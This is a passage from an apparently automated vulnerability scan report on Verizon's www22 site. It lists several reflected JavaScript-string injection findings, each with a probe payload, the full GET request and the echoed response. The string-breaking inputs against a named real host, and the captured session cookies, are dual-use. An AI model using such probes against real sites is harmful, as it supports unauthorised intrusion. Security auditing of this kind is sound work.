Path:	/foryourhome/MyAccount/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfa60"%3bf05a0d1a8b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cfa60";f05a0d1a8b6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /foryourhome/MyAccount/?cfa60"%3bf05a0d1a8b6=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:48:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66445525d5f4f58455e445a4a423660;path=/
Content-Length: 128914



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
cument.cookie="MyVzCom=remopt=Y&uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
window.location.href='https://www22.verizon.com/foryourhome/MyAccount/?cfa60";f05a0d1a8b6=1';

...[SNIP]...

1.21. https://www22.verizon.com/foryourhome/billview/PfbPage.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www22.verizon.com
Path:	/foryourhome/billview/PfbPage.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9f30"%3b3e7ac830269 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9f30";3e7ac830269 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /foryourhome/billview/PfbPage.aspx?d9f30"%3b3e7ac830269=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:47:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDSQCTQBBS=AFAADPNBHJKOMNEGALNHDACA; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660;path=/
Content-Length: 128949



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
ie="MyVzCom=remopt=Y&uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
window.location.href='https://www22.verizon.com/foryourhome/billview/PfbPage.aspx?d9f30";3e7ac830269=1';

...[SNIP]...

1.22. https://www22.verizon.com/foryourhome/myaccount/Main/MyAccount.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www22.verizon.com
Path:	/foryourhome/myaccount/Main/MyAccount.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dbeb"%3b928f0315c8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1dbeb";928f0315c8d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /foryourhome/myaccount/Main/MyAccount.aspx?1dbeb"%3b928f0315c8d=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:49:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66445525d5f4f58455e445a4a423660;path=/
Content-Length: 128975



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
Com=remopt=Y&uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
window.location.href='https://www22.verizon.com/foryourhome/myaccount/Main/MyAccount.aspx?1dbeb";928f0315c8d=1';

...[SNIP]...

1.23. https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx [Target parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www22.verizon.com
Path:	/foryourhome/registration/regprofile/ergcon.aspx

Issue detail

The value of the Target request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a525"%3b6c5402aa620 was submitted in the Target parameter. This input was echoed as 6a525";6c5402aa620 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /foryourhome/registration/regprofile/ergcon.aspx?Target=6a525"%3b6c5402aa620 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:43:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDSCSBQTCB=DGDMJDFBHBIOMKNLOAIKOOMO; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66b45525d5f4f58455e445a4a423660;path=/
Content-Length: 128927



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
window.location.href='https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx?Target=6a525";6c5402aa620';

...[SNIP]...

1.24. https://www22.verizon.com/foryourhome/registration/regprofile/ergcon.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www22.verizon.com
Path:	/foryourhome/registration/regprofile/ergcon.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcc6f"%3b98476cbd401 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fcc6f";98476cbd401 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /foryourhome/registration/regprofile/ergcon.aspx?fcc6f"%3b98476cbd401=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
